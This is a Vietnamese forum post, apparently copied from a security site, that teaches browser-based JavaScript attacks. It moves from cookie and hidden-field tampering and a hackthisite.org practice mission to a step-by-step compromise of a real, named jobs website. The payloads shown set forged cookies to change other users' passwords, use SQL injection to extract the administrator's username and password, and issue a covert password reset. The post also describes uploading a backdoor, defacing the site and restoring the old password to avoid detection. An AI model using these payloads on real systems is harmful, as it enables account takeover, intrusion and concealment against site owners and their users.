Chia Sẽ Kinh Nghiệm Về IT



Tìm Kiếm Với Google
-


Gởi Ðề Tài Mới  Gửi trả lời
 
Công Cụ Xếp Bài
Tuổi 06-08-2009, 05:51 PM   #1
hoctinhoc
Guest
 
Trả Lời: n/a
Hack bất cứ 1 trang web nào chỉ trong nháy mắt
Hack bất cứ 1 trang web nào chỉ trong nháy mắt

Đầu tiên bạn mở trang web victim lên !
Vào thanh Address chứa link trang web victim xóa sạch link , copy và pase vào đoạn code sau vào :

Code:
javascript:document.body.contentEditable='true'; document.designMode='on'; void 0
Và bây giờ bạn có thể làm gì trang web của victim cũng đc , thao tác như notepad

Và bằng chứng microsoft bị phá hủy trong nháy mắt )



Hiiiii anh em làm xong đừng nóng !


bổ sung thêm cái Hack Web Bằng JavaScript-Inline

[SANITC] : Trong bài viết này mình sẽ giới thiệu với các bạn về kĩ thuật hack web chỉ dùng JavaScript. Với kĩ thuật này, bạn có thể xem xét và hiệu chỉnh giá trị của các cookie hoặc trường ẩn trực tiếp ngay trên trang web. Tất cả chỉ với một trình duyệt web hổ trợ "debug javascript-inline", chẳng hạn như Internet Explorer, Netscape hay Mozilla, ... Cơ bản về JavaScript-Inline^^

Đa số các trình duyệt web đều hổ trợ JavaScript-Inline.
Bạn có thể thi hành JavaScript bằng cách gõ vào thanh URL như sau:
Code:
javascript:void(<đặt lệnh JavaScritpt ngay tại đây!>)
Ví dụ:

Để xem giá trị hiện tại của cookie bạn gõ :
Code:
javascript:alert(document.cookie)
Hoặc
để thay đổi giá trị của trường ẩn "hiddenid" của form đầu tiên thành "2", bạn gõ:
Code:
javascript:void(document.forms[0].hiddenid.value="2")
Mã nguồn HTML có đoạn như sau:
... Code:
var a=unescape("%43%4f%44%45%5a");

function check()

{

if (document.a.c.value == a)

{

document.location.href="http://scifi.pages.at/hackits/"+document.a.c.value+".htm";

}

else

{

alert ("wrong! - letter size?");

}

}

}
Đơn giản bạn có thể gõ thẳng vào thanh URL của IE như sau:
Code:
javascript:alert(unescape(a)) để lấy password của level tiếp theo
("CODEZ")
Realistic mission 8 trên hackthisite.org yêu cầu bạn chuyển 10 triệu đô từ tài khoản của "Gary Hunter" vào tài khoản "dropCash".
Sau khi bạn dùng SQL-Injection để lấy username của "Gary Hunter", bạn tiến hành chuyển tiền như sau:

Đăng nhập vào tài khoản của bạn. Trên thanh URL của IE bạn gõ vào:
Code:
javascript:void(document.write('
< name="the_" ="movemoney.php" method="post"><
value="GaryWilliamHunter" name="FROM" ="">< value="dropCash"
name="TO" ="">< value="10000000" name="AMOUNT" =""><
value="Move Money To A Different Account" ="submit">'))
Đoạn JavaScript trên sẽ tạo một form với trường ẩn
Code:
FROM=GaryWilliamHunter, TO=dropCash, AMOUNT=10000000
Bây giờ bạn thay đổi cookie lại như sau:
Code:
javascript:void(document.cookie="accountUsername=G aryWilliamHunter")

javascript:void(document.cookie="accountPassword=G aryWilliamHunter")
Ấn nút "Move Money To A Different Account" một cái là xong.

Mình nghĩ rất có khả năng là mission 8 tạo một session("LoggedIn").
Mỗi lần chúng ta đăng nhập vào nó sẽ đặt session("LoggedIn")=1. Chúng ta chỉ cần thay đổi lại giá trị của cookie và trường ẩn để thực hiện việc chuyển tiền trong session của chúng ta
vì nó chỉ kiểm tra sesion("LoggedIn")=1 mà không kiểm tra username thực sự là ai.

Ví dụ cuối cùng, mình sẽ trình bày về cách hack trang web
http://www.mangvieclam.com/.
.
Mình đã gởi lời nhắn cho admin của mangvieclam.com nhưng chẳng thấy liên lạc với mình để fix lỗi. Hihi, cái "message" của mình ở cuối trang index.asp trên mangvieclam.com chưa thấy ai xóa hết.

Sau khi đã đăng nhập vào mangvieclam.com, bạn gõ vào thanh URL dòng javascript:alert(document.cookie) để xem cookie.

Ban có thể thay đổi thông tin cá nhân của một user bất kì trên mangvieclam.com bằng cách đổi lại cookie username như sau: javascript:void(document.cookie="username=tên user"), sau đó chọn mục "Cập nhập thông tin"

Bạn cũng có thể thay đổi password của một user bất kì trên mangvieclam.com sau khi đã login vào với account của mình như sau: chọn mục "Thay đổi mật khẩu", gõ dòng javascript:void(document.cookie="username=tên user"+escape("' or '1'='1")) vào thanh URL, nhập password cũ là gì cũng được và password mới, sau đó ấn nút "Thay đổi mật khẩu".

Lỗi này nằm trong file icl/filerec/detail.asp, dòng thứ 43..65. Ví dụ, khi bạn set cookie username là "trungkien' or '1'='1", các câu lệnh SQL sau sẽ được thực thi:

Select Count(UserID) As Check From tblUserInfo Where UserID = 'trungkien' or '1'='1' And Passwords='md5(password cũ sai)' And Active = 1982 // luôn trả về true do điều kiện or '1'='1' đúng mặc dù password cũ sai

Update tblUserInfo Set Passwords = 'md5(password mới)' Where UserID = 'trungkien' or '1'='1' And Active = 1982 // luôn set password mới cho user "trungkien" do điều kiện UserID = 'trungkien' đúng trước điều kiện '1'='1'

Rất tiếc là lỗi này không thể khai thác trên
LINK :http://www.mangvieclam.com/
do lỗi lập trình.

Select Count(UserID) As Check From tblUserInfo Where UserID = N'trungkien' or '1'='1' And Passwords = N'...' And Active = 1982

Tuy nhiên, website
LINK :http://www.mangvieclam.com/
dùng CSDL MS-SQL nên mình dễ dàng lấy được username và password của admin từ tblConfig như sau:

Đầu tiên mình lấy username bằng javascript:void(document.cookie="username="+escape ("' or 1=convert(int,(select adminid from tblconfig where accid=1))--"))


Chọn mục "Cập nhập thông tin"

Tên đăng nhâp của admin là 'ngtuan'

Tương tự mình lấy password của admin bằng Code:
javascript:void(document.cookie="username="+escape ("' or 1=convert(int,(select adminpass from tblconfig where accid=1))--"))
Bây giờ mình đặt lại password mới là 'hacked'


HTML
Code:
<form action=http://www.mangvieclam.com/log.asp method=post>

username: <input type=text name=username><br>

password: <input type=password name=password><br>

<input type=hidden name=ChoseLogin value=3>

<input type=hidden name=mod value=1>

<input type=submit value=login>

</form>


Upload backdoor và thay đổi trang index.asp. Sau đó restore lại pasword cũ cho admin để tránh bị phát hiện:


javascript:void(document.cookie="username="+escape ("';update tblconfig set adminpass='...' where accid=1--"))


Một giải pháp cho mangvieclam.com là bạn nên chuyển biến Request.Cookies("UserName") thành biến phiên Session("UserName") để tránh bị giả mạo username như ở trên.

Nguồn: Sanitc.com | Thủ thuật

  Trả lời ngay kèm theo trích dẫn này
Gửi trả lời



Quyền Hạn Của Bạn
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is Mở
Hình Cảm xúc đang Mở
[IMG] đang Mở
Mã HTML đang Tắt




Bây giờ là 04:44 PM. Giờ GMT +7



Diễn đàn tin học QuantriNet
quantrinet.com | quantrimang.co.cc
Founded by Trương Văn Phương | Developed by QuantriNet's members.
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.